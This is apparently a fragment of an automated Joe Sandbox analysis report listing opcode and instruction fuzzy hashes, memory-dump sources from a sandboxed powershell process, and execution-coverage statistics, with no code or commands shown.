                                                            • Opcode Fuzzy Hash: 760e6fa42a0367386fbeeba5782cdd86a70ef09439d6653d36a0a29ed9f05791
                                                            • Instruction Fuzzy Hash: CA1245B1704306DFDB149BE9C45076BBBA6AFC6210F24C0BAE665CF253DA31D842C7A1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.1653927709.0000000007AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AF0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7af0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3e33c3575886f06d716b2fa85ea46134a93be979f6a336cc281b68619e03fa2b
                                                            • Instruction ID: 725b7576b413dd2ad75820643b2282f3b637071e3ab986f0a159290ac8682592
                                                            • Opcode Fuzzy Hash: 3e33c3575886f06d716b2fa85ea46134a93be979f6a336cc281b68619e03fa2b
                                                            • Instruction Fuzzy Hash: E71238B1B043119FD7259BE898007AABBB29FC6251F54847AF625CF351EB71CC42C7A2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.1648397955.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_4c60000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1e64da10cd28fe1e516f8f999c87701d2519f56f5b6e637d9ae0b7fd1cc17fde
                                                            • Instruction ID: 6d03f4e10a3a69b30614eb9b308071342e4b45f8352136dcd5ad3db77a8e8e5d
                                                            • Opcode Fuzzy Hash: 1e64da10cd28fe1e516f8f999c87701d2519f56f5b6e637d9ae0b7fd1cc17fde
                                                            • Instruction Fuzzy Hash: 38226134B002189FCB25DB74D8946AEB7B3BF89305F1480A9D54AAB351DB35EE85CF81
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.1653927709.0000000007AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AF0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7af0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5db33790484bcdb48adc5759f214d8c875d99270c17c7fba540f5439acda503e
                                                            • Instruction ID: 1fd36795e00c3d9e6497ae4d6812ffa9075bf92cc27ea389eda86f6c440b55ed
                                                            • Opcode Fuzzy Hash: 5db33790484bcdb48adc5759f214d8c875d99270c17c7fba540f5439acda503e
                                                            • Instruction Fuzzy Hash: 34226BB4A01205EFDB14CF99C480A5DBBB2FF89704F14C0A9E9159B356DB72ED82CB91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.1653927709.0000000007AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AF0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7af0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b5c3bd1af31a03bddee39748484b44ba89a8e4e085bbc807dfe468c7f35d4a76
                                                            • Instruction ID: 6ca2e10c0fa45354f272b9fe31adb971cdd16ca7c97e550f743bb7ce4c1cbfa8
                                                            • Opcode Fuzzy Hash: b5c3bd1af31a03bddee39748484b44ba89a8e4e085bbc807dfe468c7f35d4a76
                                                            • Instruction Fuzzy Hash: 8E125BB4B00209DFD754DB98C490B69BBF2EF89314F14C06AEA159F355DB72EC428B92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.1653927709.0000000007AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AF0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7af0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: cae42f46a21a5760659e34b3dfe507ee4ce4cc81750743e6b50762e9f6ed2e74
                                                            • Instruction ID: a15505b6ac0eaf340b7fcd474ed911ec5911911554bfae268dc5d89550da8993
                                                            • Opcode Fuzzy Hash: cae42f46a21a5760659e34b3dfe507ee4ce4cc81750743e6b50762e9f6ed2e74
                                                            • Instruction Fuzzy Hash: C4126CB4A01205EFDB14CF99C490B5DBBB2AF85704F14C0AAFA255B356D772ED82CB81
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.1653927709.0000000007AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AF0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7af0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 89d83269d1a5cbd4cc73d3121790255a060f237a571a023a0fbbe9fcae9bd5a3
                                                            • Instruction ID: c6657f308a9e6a9f631d3bc54e147794e2cde591555e6a35a5ad104551710ef5
                                                            • Opcode Fuzzy Hash: 89d83269d1a5cbd4cc73d3121790255a060f237a571a023a0fbbe9fcae9bd5a3
                                                            • Instruction Fuzzy Hash: 35024AB4B00209DFD714CB98C590BA9B7B2EF89304F14C469EA15AF356D776EC82CB91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.1653927709.0000000007AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AF0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7af0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0ac486c8cc9c506b2600a2d82fec16ce1f5a1e552f54c59dbea757152b5d04a4
                                                            • Instruction ID: 657b125786cbe91751cc7d254e8464f804f692dff737cc04645e35f89523f26a
                                                            • Opcode Fuzzy Hash: 0ac486c8cc9c506b2600a2d82fec16ce1f5a1e552f54c59dbea757152b5d04a4
                                                            • Instruction Fuzzy Hash: 8AF13AB4A00209DFD714CB99C580AA9B7F2FF89714F14C06AEA25AB355D772EC42CF91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.1648397955.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_4c60000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d88e9f27fc8cfc74ffd404b1a5991129e231e47575f1c3b411d4606623d787ea
                                                            • Instruction ID: ac4e4bca7d578218ee8d7cf1f1f16ab292266333545a22b49a699651b9351cc4
                                                            • Opcode Fuzzy Hash: d88e9f27fc8cfc74ffd404b1a5991129e231e47575f1c3b411d4606623d787ea
                                                            • Instruction Fuzzy Hash: 99F11974A002199FDB15CF98D484AADBBF2FF89310F24C569E805AB365D731ED82CB91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.1653927709.0000000007AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AF0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7af0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c6a51243549007e43c00f604608ea7fcab93403f165611ceabdca4c3a4fe06a9
                                                            • Instruction ID: 59e4b5fa734757cefbf42ca6660b77c6cf3a2419af74214325518790f32d3719
                                                            • Opcode Fuzzy Hash: c6a51243549007e43c00f604608ea7fcab93403f165611ceabdca4c3a4fe06a9
                                                            • Instruction Fuzzy Hash: 3BC171B5A00205DFDB14CF98C590AA9BBF2EFC9314F25C4AAEA15AB351C772DC42CB51
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.1653927709.0000000007AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AF0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7af0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c9d99dcd2b3e60f3f09acd9f682290c76bc6641ef2db64e0b9ecfdf439242307
                                                            • Instruction ID: 80f0561e674772927846c4b1d71e1a95b7a9b6540b8e686e60a59f4d101162ee
                                                            • Opcode Fuzzy Hash: c9d99dcd2b3e60f3f09acd9f682290c76bc6641ef2db64e0b9ecfdf439242307
                                                            • Instruction Fuzzy Hash: 07B127B1B04206DFCB649FA8D4007AABBB1AFC5211F24C06AF626DF251DB75CD41CB91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.1648397955.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_4c60000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4be6d6b09f7a103e77d12e19f63f706c23162083d815809fd8f4ff66e8225318
                                                            • Instruction ID: b89497df2e379fbeae6cd2f861ee32c464e7ac2b5d199e213af18464fedf5c25
                                                            • Opcode Fuzzy Hash: 4be6d6b09f7a103e77d12e19f63f706c23162083d815809fd8f4ff66e8225318
                                                            • Instruction Fuzzy Hash: 1BC19E34A01248DFCB15DFA4D584AADBBB3FF85314F158969E406AB364CB74ED89CB40
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.1648397955.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_4c60000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 05077a162a5107cb691a119ce90789ee7023d83669be2bade0839652940a4e6e
                                                            • Instruction ID: a65d33897d26fe594e1f07a21798c2ffcf9a3b5e76e86537359e2f8bb56b0388
                                                            • Opcode Fuzzy Hash: 05077a162a5107cb691a119ce90789ee7023d83669be2bade0839652940a4e6e
                                                            • Instruction Fuzzy Hash: 26B15970E00209DFDB10CFA9E8857AEBBF2AF48754F14C12DD816AB254EB74A945CF91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.1648397955.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_4c60000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: dd17731b419a07ad68f66a58a58d8f3671a8e80ccced63941042766e34119e7d
                                                            • Instruction ID: 0c15d8d709e4df95882d9f93c4a32da65cab146045bff44345f48797f96d6227
                                                            • Opcode Fuzzy Hash: dd17731b419a07ad68f66a58a58d8f3671a8e80ccced63941042766e34119e7d
                                                            • Instruction Fuzzy Hash: 84B18C71E00209DFDB10CFA9E88179DBBF2AF88714F14C52DD816EB294EB74A941CB91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.1653927709.0000000007AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AF0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7af0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 223d385f17ad264941459e7fafab702bcffbc78d6a007b0d525444cc4cdf95dc
                                                            • Instruction ID: 1cb14fbf90c72d1a9290a332b5e071a91b20913aaa3d06aa89555ddd619e9b23
                                                            • Opcode Fuzzy Hash: 223d385f17ad264941459e7fafab702bcffbc78d6a007b0d525444cc4cdf95dc
                                                            • Instruction Fuzzy Hash: 7D915BB0B00209DFDB14DF98C490B9AB7F2AF89314F25C469EA15AB355CB72DC42CB61
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.1653927709.0000000007AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AF0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7af0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6ddbde257c9a855d22d203a50667a93e226da9f8ac7eeea5182476f0b66a1ca9
                                                            • Instruction ID: c9b94a13858fb7a06a7e7b577bd5963f38bdb2d360b9b4d19469238870bada7e
                                                            • Opcode Fuzzy Hash: 6ddbde257c9a855d22d203a50667a93e226da9f8ac7eeea5182476f0b66a1ca9
                                                            • Instruction Fuzzy Hash: 06816DB5A01205DFDB14CF98C490A99BBB2FF89314F15C4A9EA14AB355C772DC82CF51
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.1648397955.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_4c60000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a3903977ec52775d6890fcd3a8b20b2780afab70b7215493ab950eed3f49c5db
                                                            • Instruction ID: e04e334055b8e792fa4035f4c7a39dea987a0bdbc518c6b625e5cf23fef5f8a7
                                                            • Opcode Fuzzy Hash: a3903977ec52775d6890fcd3a8b20b2780afab70b7215493ab950eed3f49c5db
                                                            • Instruction Fuzzy Hash: C071AB71A012088FDB14DF68D880A9DFBF6FF89318F14C96AD006DB690DB70AD46CB90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.1653927709.0000000007AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AF0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7af0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 8cdd2474a291149205b3335e81a1f4e21c5bb27a219e5271666e1737844eac3b
                                                            • Instruction ID: 227318341cc687fd0fd1a252693ca72f11e0e730c162058e54539c3caf54b7b0
                                                            • Opcode Fuzzy Hash: 8cdd2474a291149205b3335e81a1f4e21c5bb27a219e5271666e1737844eac3b
                                                            • Instruction Fuzzy Hash: 73716DB0A10209DFDB54DF98C490BAAB7B2AFCD214F14C169EA25AB351DB72DC41CF91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.1648397955.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_4c60000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 00c92a76a8786d7c49304e51c2443810e7789d77bf31f75a13875eeab37b1213
                                                            • Instruction ID: 52854a241a23c61afc02d1d2c0e3692c34b53e36c6a0ed5e9448864c7a069747
                                                            • Opcode Fuzzy Hash: 00c92a76a8786d7c49304e51c2443810e7789d77bf31f75a13875eeab37b1213
                                                            • Instruction Fuzzy Hash: 31714E70A012089FDB14DFA9D484BEDBBF6FF88304F14882AD412AB760DB74AD85CB51
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.1653927709.0000000007AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AF0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7af0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 10e5e94f366eed5a59d8416a9b243fff14f8cfb977abb2abd659379be94b817f
                                                            • Instruction ID: ef90b47914fdef60fd75285b11ab222c5934e3b69705260edc2485f349f54c31
                                                            • Opcode Fuzzy Hash: 10e5e94f366eed5a59d8416a9b243fff14f8cfb977abb2abd659379be94b817f
                                                            • Instruction Fuzzy Hash: 1E618FF4A04245DFDB14CF98C490A9ABBB2AF8D314F14C16AEA24AB351D732EC41CF91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.1653927709.0000000007AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AF0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7af0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e8a661a4457bec9e4121b670eaf5aea6b0257ad390742332824e634a7ade7d3e
                                                            • Instruction ID: 4cfe533f4cbd6773ebee801f735a96a840cb0e59eb1eff67a7c1b39687ca88a2
                                                            • Opcode Fuzzy Hash: e8a661a4457bec9e4121b670eaf5aea6b0257ad390742332824e634a7ade7d3e
                                                            • Instruction Fuzzy Hash: 94412AF1B00301DFC724AF988801B6A7FB69FC5255F9484A6FA149F252D731D851C772
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.1648397955.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_4c60000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 083f11c3b6c340825695d6ef924153684b3b874ed60d4e86aa5dcd0052f0941c
                                                            • Instruction ID: fba861d691163f4338ea92b7b3bfcf8a7835c227684b657b93d5ca7b723115d5
                                                            • Opcode Fuzzy Hash: 083f11c3b6c340825695d6ef924153684b3b874ed60d4e86aa5dcd0052f0941c
                                                            • Instruction Fuzzy Hash: 3F419F34B012448FDB15DB24D898BAE7BF3EF89355F048469E406EB7A0CB34AD41CBA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.1648397955.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_4c60000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a93c74f61130532ef8e0fc92b9b3b9a5156d317f5b1f8bd76bf22abc036292c9
                                                            • Instruction ID: 4c0af2aff15d5f0d5887287de795c82ab313142b551c43fb2f3576dc9cb90e70
                                                            • Opcode Fuzzy Hash: a93c74f61130532ef8e0fc92b9b3b9a5156d317f5b1f8bd76bf22abc036292c9
                                                            • Instruction Fuzzy Hash: E551C474A00219EFDB05CF98D484A9DBBB2FF88314F28C559E805AB365D775ED82CB90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.1648397955.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_4c60000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 63d4c0a9c8905b47b56bdcf1cb67267e8230f935e842c396bcd5b09f33de5c3a
                                                            • Instruction ID: 9c2c13d24b12388961ebffb39518a6d38431108a6937c31bbbfbd6210cde600c
                                                            • Opcode Fuzzy Hash: 63d4c0a9c8905b47b56bdcf1cb67267e8230f935e842c396bcd5b09f33de5c3a
                                                            • Instruction Fuzzy Hash: 2B419070A012088FDB14DFA9D8847DDBBB2FF89344F14886AD002AB750DB74AD85CB90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.1648397955.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_4c60000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f0a0b581d4bc1c87fe9f0a4817b034ca7627a493b4382937f0f0bec3bfdf63b7
                                                            • Instruction ID: 34a07f1c4104d1b4ceac24908e7c2d018a0ef40f0133857bd78b11e5912b768c
                                                            • Opcode Fuzzy Hash: f0a0b581d4bc1c87fe9f0a4817b034ca7627a493b4382937f0f0bec3bfdf63b7
                                                            • Instruction Fuzzy Hash: 8E41B2346092458FCB06CF58C994AA9BFB2FF4A310B1585DAD445EB352C736FC51CBA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.1648397955.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_4c60000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: cb4cf830714a1ddd77e4efedbca3d0ab1b7a48031f5a056b6b02af463751b149
                                                            • Instruction ID: 28a994854a62463032013004a88dc8a37e62a012b4e6e4117bf253767748f308
                                                            • Opcode Fuzzy Hash: cb4cf830714a1ddd77e4efedbca3d0ab1b7a48031f5a056b6b02af463751b149
                                                            • Instruction Fuzzy Hash: 9C414C74A006059FDB06DF58C0D4AAAF7B2FF48314B1185A9D806AB764C732FD51CBA4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.1653927709.0000000007AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AF0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7af0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 98a5b6fea3b782d0a7ae5b29ae0fd6384673d60f2f9db1bc1e0da01a5bb9170e
                                                            • Instruction ID: 43e301a94fc3198d2b23768a539fd04efae48d0a10ef0563c158074291cadbd9
                                                            • Opcode Fuzzy Hash: 98a5b6fea3b782d0a7ae5b29ae0fd6384673d60f2f9db1bc1e0da01a5bb9170e
                                                            • Instruction Fuzzy Hash: 42212CF1700309DBEB2466FAC850B36B6E69FC5616F24843AE716DB381E976D8818360
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.1648397955.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_4c60000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 88093e715e3386e191452fd7837d840f6938e89fc5b62e5bae2db663425d6293
                                                            • Instruction ID: a6fdca1884f60c48583754ffb4407c0dc9324e0839476cfdf6b649f11e53a31a
                                                            • Opcode Fuzzy Hash: 88093e715e3386e191452fd7837d840f6938e89fc5b62e5bae2db663425d6293
                                                            • Instruction Fuzzy Hash: 1D313B34A001188FCB25DB64C8916EEB7B2AF4A309F1084E9C50AAB351CB35EE85DF81
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.1653927709.0000000007AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AF0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7af0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: df97c2f78900f14ad8cb98d5c83fc8c60cd9b1ad9cab842796a53926bf80e0db
                                                            • Instruction ID: ad31080cf818ce1f8f3afa2809b797acb9facc092b241f7c3fdd7e3a0fe5964f
                                                            • Opcode Fuzzy Hash: df97c2f78900f14ad8cb98d5c83fc8c60cd9b1ad9cab842796a53926bf80e0db
                                                            • Instruction Fuzzy Hash: B321F7F5B00302DFDB605BE5844077AF6A59FC4691F144026FB21DB295FB76C881CBA6
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.1653927709.0000000007AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AF0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7af0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 839dcbee98650217c3e3f0664c553584fb97df0eeb0252a8b769c5ea519fef2c
                                                            • Instruction ID: a8997aaf6c21d191f7b96aa2f3a8bfc8b129702a0755f792e37e47a5cc23bc17
                                                            • Opcode Fuzzy Hash: 839dcbee98650217c3e3f0664c553584fb97df0eeb0252a8b769c5ea519fef2c
                                                            • Instruction Fuzzy Hash: 64115CF270030DE7EB346AEBC44077677AB5FC4652F248425BB15AB381E975D9808360
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.1653927709.0000000007AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AF0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7af0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d3d6eece4aeb3e81d3a726cd2231febd5d83111a56313d5977810b7b3f951135
                                                            • Instruction ID: 51da8068d1c7707e6d62cb13d59e522e87a00e8daea1b34a323eb8988b83757b
                                                            • Opcode Fuzzy Hash: d3d6eece4aeb3e81d3a726cd2231febd5d83111a56313d5977810b7b3f951135
                                                            • Instruction Fuzzy Hash: 9101F77631021ADBD72097EAE80067AF7A99BC6122F14C03EFA65CB240D636C846C7A0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.1648397955.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_4c60000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7a21ce182b4645861df9735c1438a0fc405839b5e5f7ed48b95b0979023737b9
                                                            • Instruction ID: 52a2e0ba447fd2377f6ff9d5586d8ab5618b6b16cc0c3b795f4788b3f19b1fbb
                                                            • Opcode Fuzzy Hash: 7a21ce182b4645861df9735c1438a0fc405839b5e5f7ed48b95b0979023737b9
                                                            • Instruction Fuzzy Hash: EA11C634A00219AFDB05CF98D884A9DBBB6FF88314F288558E405AB365D775ED82CF50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.1653927709.0000000007AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AF0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7af0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 584a3913bed7d41f6751d29dc0af2e109adf5df94d8de11209de24b86f245c04
                                                            • Instruction ID: 2108930940694c1c8b8ad4272d9396267f2db374b9021a0985f6588530823504
                                                            • Opcode Fuzzy Hash: 584a3913bed7d41f6751d29dc0af2e109adf5df94d8de11209de24b86f245c04
                                                            • Instruction Fuzzy Hash: 6BA002742010009BC644DB54C991814F761EFC5219728C4DDA8198B256CF33ED03DA40
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Execution Graph

                                                            Execution Coverage:2.8%
                                                            Dynamic/Decrypted Code Coverage:99.8%
                                                            Signature Coverage:1.6%
                                                            Total number of Nodes:1674
                                                            Total number of Limit Nodes:5
